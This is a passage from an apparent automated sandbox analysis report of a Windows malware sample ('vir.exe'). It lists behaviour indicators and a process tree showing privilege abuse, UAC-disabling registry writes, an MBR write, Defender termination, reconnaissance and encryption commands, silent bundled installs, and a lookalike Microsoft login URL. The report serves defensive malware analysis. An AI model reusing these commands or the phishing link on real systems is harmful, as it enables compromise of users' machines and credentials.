SeTakeOwnershipPrivilege 5616 WMIC.exe Token: SeLoadDriverPrivilege 5616 WMIC.exe Token: SeSystemProfilePrivilege 5616 WMIC.exe Token: SeSystemtimePrivilege 5616 WMIC.exe Token: SeProfSingleProcessPrivilege 5616 WMIC.exe Token: SeIncBasePriorityPrivilege 5616 WMIC.exe Token: SeCreatePagefilePrivilege 5616 WMIC.exe Token: SeBackupPrivilege 5616 WMIC.exe Token: SeRestorePrivilege 5616 WMIC.exe Token: SeShutdownPrivilege 5616 WMIC.exe Token: SeDebugPrivilege 5616 WMIC.exe Token: SeSystemEnvironmentPrivilege 5616 WMIC.exe Token: SeRemoteShutdownPrivilege 5616 WMIC.exe Token: SeUndockPrivilege 5616 WMIC.exe Token: SeManageVolumePrivilege 5616 WMIC.exe Token: 33 5616 WMIC.exe Token: 34 5616 WMIC.exe Token: 35 5616 WMIC.exe Token: 36 5616 WMIC.exe Token: SeIncreaseQuotaPrivilege 5616 WMIC.exe Token: SeSecurityPrivilege 5616 WMIC.exe Token: SeTakeOwnershipPrivilege 5616 WMIC.exe Token: SeLoadDriverPrivilege 5616 WMIC.exe Token: SeSystemProfilePrivilege 5616 WMIC.exe Token: SeSystemtimePrivilege 5616 WMIC.exe Token: SeProfSingleProcessPrivilege 5616 WMIC.exe Token: SeIncBasePriorityPrivilege 5616 WMIC.exe Token: SeCreatePagefilePrivilege 5616 WMIC.exe Token: SeBackupPrivilege 5616 WMIC.exe Token: SeRestorePrivilege 5616 WMIC.exe Token: SeShutdownPrivilege 5616 WMIC.exe Token: SeDebugPrivilege 5616 WMIC.exe Token: SeSystemEnvironmentPrivilege 5616 WMIC.exe Token: SeRemoteShutdownPrivilege 5616 WMIC.exe Token: SeUndockPrivilege 5616 WMIC.exe Token: SeManageVolumePrivilege 5616 WMIC.exe Token: 33 5616 WMIC.exe Token: 34 5616 WMIC.exe Token: 35 5616 WMIC.exe Token: 36 5616 WMIC.exe Token: SeDebugPrivilege 6956 Romilyaa.exe Token: SeDebugPrivilege 432 Romilyaa.exe Token: SeDebugPrivilege 4896 Romilyaa.exe Token: SeDebugPrivilege 6180 Romilyaa.exe Token: SeAuditPrivilege 3200 svchost.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 5916 efsui.exe 5916 efsui.exe 5916 efsui.exe 472 WinaeroTweaker-1.40.0.0-setup.tmp 6864 Romilyaa.exe 3532 Romilyaa.exe 6832 Romilyaa.exe 6956 Romilyaa.exe 432 Romilyaa.exe 4896 Romilyaa.exe 3368 msedge.exe 6180 Romilyaa.exe 5716 Romilyaa.exe 5264 Romilyaa.exe 7028 Romilyaa.exe 7080 Romilyaa.exe 4296 Romilyaa.exe 6104 Romilyaa.exe 472 Romilyaa.exe 7136 Romilyaa.exe 1384 Romilyaa.exe 2772 Romilyaa.exe 4036 Rover.exe 4408 Romilyaa.exe 6560 Romilyaa.exe 5396 Romilyaa.exe 7124 Romilyaa.exe 3204 Romilyaa.exe 5648 Romilyaa.exe 5520 Romilyaa.exe 1096 Romilyaa.exe 4860 Romilyaa.exe 3088 Romilyaa.exe -
Suspicious use of SendNotifyMessage 42 IoCs
pid Process 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 5916 efsui.exe 5916 efsui.exe 5916 efsui.exe 6864 Romilyaa.exe 3532 Romilyaa.exe 6832 Romilyaa.exe 6956 Romilyaa.exe 432 Romilyaa.exe 4896 Romilyaa.exe 6180 Romilyaa.exe 5716 Romilyaa.exe 5264 Romilyaa.exe 7028 Romilyaa.exe 7080 Romilyaa.exe 4296 Romilyaa.exe 6104 Romilyaa.exe 472 Romilyaa.exe 7136 Romilyaa.exe 1384 Romilyaa.exe 2772 Romilyaa.exe 4408 Romilyaa.exe 6560 Romilyaa.exe 5396 Romilyaa.exe 7124 Romilyaa.exe 3204 Romilyaa.exe 5648 Romilyaa.exe 5520 Romilyaa.exe 1096 Romilyaa.exe 4860 Romilyaa.exe 3088 Romilyaa.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 396 3.exe 396 3.exe 2904 OpenWith.exe 6180 Romilyaa.exe 6104 Romilyaa.exe 6560 Romilyaa.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4008 wrote to memory of 3096 4008 vir.exe 82 PID 4008 wrote to memory of 3096 4008 vir.exe 82 PID 4008 wrote to memory of 3096 4008 vir.exe 82 PID 4008 wrote to memory of 652 4008 vir.exe 83 PID 4008 wrote to memory of 652 4008 vir.exe 83 PID 4008 wrote to memory of 652 4008 vir.exe 83 PID 652 wrote to memory of 2768 652 cmd.exe 85 PID 652 wrote to memory of 2768 652 cmd.exe 85 PID 652 wrote to memory of 2768 652 cmd.exe 85 PID 652 wrote to memory of 4316 652 cmd.exe 86 PID 652 wrote to memory of 4316 652 cmd.exe 86 PID 652 wrote to memory of 4316 652 cmd.exe 86 PID 652 wrote to memory of 2584 652 cmd.exe 88 PID 652 wrote to memory of 2584 652 cmd.exe 88 PID 652 wrote to memory of 2584 652 cmd.exe 88 PID 2768 wrote to memory of 4036 2768 cmd.exe 108 PID 2768 wrote to memory of 4036 2768 cmd.exe 108 PID 2768 wrote to memory of 4036 2768 cmd.exe 108 PID 4316 wrote to memory of 3516 4316 cmd.exe 91 PID 4316 wrote to memory of 3516 4316 cmd.exe 91 PID 4316 wrote to memory of 3516 4316 cmd.exe 91 PID 2768 wrote to memory of 2864 2768 cmd.exe 92 PID 2768 wrote to memory of 2864 2768 cmd.exe 92 PID 2768 wrote to memory of 2864 2768 cmd.exe 92 PID 2768 wrote to memory of 4352 2768 cmd.exe 93 PID 2768 wrote to memory of 4352 2768 cmd.exe 93 PID 2768 wrote to memory of 4352 2768 cmd.exe 93 PID 4316 wrote to memory of 3468 4316 cmd.exe 94 PID 4316 wrote to memory of 3468 4316 cmd.exe 94 PID 4316 wrote to memory of 3468 4316 cmd.exe 94 PID 3468 wrote to memory of 4608 3468 net.exe 95 PID 3468 wrote to memory of 4608 3468 net.exe 95 PID 3468 wrote to memory of 4608 3468 net.exe 95 PID 4316 wrote to memory of 3124 4316 cmd.exe 96 PID 4316 wrote to memory of 3124 4316 cmd.exe 96 PID 4316 wrote to memory of 3124 4316 cmd.exe 96 PID 3124 wrote to memory of 1200 3124 net.exe 97 PID 3124 wrote to memory of 1200 3124 net.exe 97 PID 3124 wrote to memory of 1200 3124 net.exe 97 PID 4316 wrote to memory of 2620 4316 cmd.exe 98 PID 4316 wrote to memory of 2620 4316 cmd.exe 98 PID 4316 wrote to memory of 2620 4316 cmd.exe 98 PID 652 wrote to memory of 3828 652 cmd.exe 103 PID 652 wrote to memory of 3828 652 cmd.exe 103 PID 652 wrote to memory of 3828 652 cmd.exe 103 PID 652 wrote to memory of 2044 652 cmd.exe 104 PID 652 wrote to memory of 2044 652 cmd.exe 104 PID 652 wrote to memory of 2044 652 cmd.exe 104 PID 652 wrote to memory of 3368 652 cmd.exe 106 PID 652 wrote to memory of 3368 652 cmd.exe 106 PID 652 wrote to memory of 4160 652 cmd.exe 107 PID 652 wrote to memory of 4160 652 cmd.exe 107 PID 652 wrote to memory of 4160 652 cmd.exe 107 PID 3368 wrote to memory of 1504 3368 msedge.exe 109 PID 3368 wrote to memory of 1504 3368 msedge.exe 109 PID 652 wrote to memory of 4036 652 cmd.exe 108 PID 652 wrote to memory of 4036 652 cmd.exe 108 PID 652 wrote to memory of 4036 652 cmd.exe 108 PID 652 wrote to memory of 2260 652 cmd.exe 111 PID 652 wrote to memory of 2260 652 cmd.exe 111 PID 2260 wrote to memory of 1048 2260 msedge.exe 114 PID 2260 wrote to memory of 1048 2260 msedge.exe 114 PID 3368 wrote to memory of 1552 3368 msedge.exe 116 PID 3368 wrote to memory of 1552 3368 msedge.exe 116 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1" Rover.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\cf0b7170-371f-4c81-896b-ee0ba534e3b0\ProgressBarSplash.exe"C:\Users\Admin\AppData\Local\Temp\cf0b7170-371f-4c81-896b-ee0ba534e3b0\ProgressBarSplash.exe" -unpacking2⤵
- Executes dropped EXE
PID:3096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\!main.cmd" "2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
PID:4036
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2864
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- Gathers network information
PID:3516
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵PID:4608
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵PID:1200
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ23⤵
- Manipulates Digital Signatures
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8a5fc3cb8,0x7ff8a5fc3cc8,0x7ff8a5fc3cd84⤵PID:1504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:24⤵PID:1552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:84⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:14⤵PID:3396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:14⤵PID:4560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:14⤵PID:6004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:5352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:14⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:14⤵PID:6020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:14⤵PID:4172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:14⤵PID:5964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:5540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:14⤵PID:3992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:14⤵PID:7060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12561280254687870492,6838944470369788640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:14⤵PID:6272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵
- System Location Discovery: System Language Discovery
PID:4160 -
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:4296
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:956
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:4596
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:5220
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\Rover.exeRover.exe3⤵
- Modifies WinLogon for persistence
- UAC bypass
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- System policy modification
PID:4036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\web.htm3⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8a5fc3cb8,0x7ff8a5fc3cc8,0x7ff8a5fc3cd84⤵PID:1048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,2754072309918228485,13977652265522813558,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:24⤵PID:5612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,2754072309918228485,13977652265522813558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5688
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\Google.exeGoogle.exe3⤵
- Executes dropped EXE
PID:3616
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\helper.vbs"3⤵PID:6140
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6124
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3448
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:5692
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5508
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:5484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2524 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3448
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
PID:5348 -
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet5⤵
- Executes dropped EXE
PID:1356 -
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{76CD2826-7DAC-45F6-A950-4F948DAEA5B0} {6BD0FD33-2EF0-4A51-8421-6E59BC2D58C1} 13566⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c install.bat5⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "DroidCamFilter32.ax"6⤵
- Loads dropped DLL
- Modifies registry class
PID:5176
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "DroidCamFilter64.ax"6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5244 -
C:\Windows\system32\regsvr32.exe/s "DroidCamFilter64.ax"7⤵
- Loads dropped DLL
- Modifies registry class
PID:752
-
-
-
-
C:\Program Files (x86)\DroidCam\lib\insdrv.exe"C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +v5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5224
-
-
C:\Program Files (x86)\DroidCam\lib\insdrv.exe"C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 19125⤵
- Program crash
PID:5864
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵
- Blocklisted process makes network request
PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
